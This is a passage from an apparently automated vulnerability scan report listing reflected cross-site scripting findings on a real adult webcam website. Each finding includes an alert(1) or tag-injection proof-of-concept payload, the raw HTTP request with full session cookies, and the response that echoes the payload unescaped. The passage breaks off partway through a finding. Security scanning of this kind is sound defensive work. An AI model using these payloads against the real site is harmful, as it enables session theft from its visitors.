HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:00 GMT Connection: close Content-Length: 33620 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.74. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/cams-aroundthehouse/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1145a'-alert(1)-'9eeece25a26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:16 GMT Connection: close Content-Length: 33767 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.75. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/caught-on-cam/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3af4"><a>c33137ced61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:56 GMT Connection: close Content-Length: 26092 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.76. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/caught-on-cam/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9d8'-alert(1)-'484051df056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:19 GMT Connection: close Content-Length: 26239 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.77. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7330d'-alert(1)-'69a435aad31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:18 GMT Connection: close Content-Length: 116890 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.78. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f29d6"><a>e94ae201611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/couple/?f29d6"><a>e94ae201611=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:09 GMT Connection: close Content-Length: 116726 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/couple/?f29d6"><a>e94ae201611=1"> ...[SNIP]...
2.79. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/fetish/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb492'-alert(1)-'e05d7866c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:57 GMT Connection: close Content-Length: 214380 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.80. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/fetish/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68a0"><a>c6c73a2ee9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:45 GMT Connection: close Content-Length: 214124 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1"> ...[SNIP]...
2.81. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/fetish/categories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceae9'-alert(1)-'1ae32c8a8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:27 GMT Connection: close Content-Length: 25109 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a ...[SNIP]...
2.82. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/fetish/categories/
Issue detail
